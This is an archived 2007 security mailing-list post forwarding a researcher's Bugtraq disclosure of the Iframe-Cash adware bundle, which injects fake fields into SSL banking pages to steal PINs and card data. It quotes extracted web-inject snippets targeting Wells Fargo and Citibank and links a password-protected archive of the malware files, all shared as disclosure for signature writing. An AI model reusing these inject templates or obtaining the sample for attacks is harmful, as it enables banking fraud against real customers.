funsec mailing list archives
[Fwd: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..]
From: rms () computerbytesman com
Date: Tue, 13 Mar 2007 12:58:46 -0400 (EDT)
Perhaps Web browsers shouldn't allow external DOM access to https Web pages.... Richard ---------------------------- Original Message ---------------------------- Subject: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god.. From: "Thierry Zoller" <Thierry () Zoller lu> Date: Sun, March 11, 2007 1:30 pm To: bugtraq () securityfocus com -------------------------------------------------------------------------- Dear list, Whoever deals with these poeple and thinks they are a benign Adware company (and thus spreads their bundles. Check this : Ignoring the fact that they basicaly install a Rootkit, I attached a few files I reversed, they install a DLL that does not directly KEYLOG your banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page asking you to enter more details (like PIN, Magic Password etc), then capture that data and transmit it (I did no further investigation) http://secdev.zoller.lu/system32.zip Pass: 123 I am disgusted. They even created their own XML parser for this ... An extract of HTML code they inject : ------------------------------------- <inject url="wellsfargo" before="name=userid autocomplete='off'></DIV>" what=" <DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin autocomplete='off'></SPAN></DIV> " block="alt=Go" check="pin" quan="4" content="d"
</inject> ------------------------------------ Attached the main files (pass 123), feel free to add this as HIPS or whatever signatures, those interested in a complete reversal can contact me to receive the EXE in question. I have no more time feel free to dig deeper. I especialy liked this : ------------------------ <inject url="citibank.com" <TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR> Puke.. -- http://secdev.zoller.lu Thierry Zoller _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- [Fwd: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..] rms (Mar 14)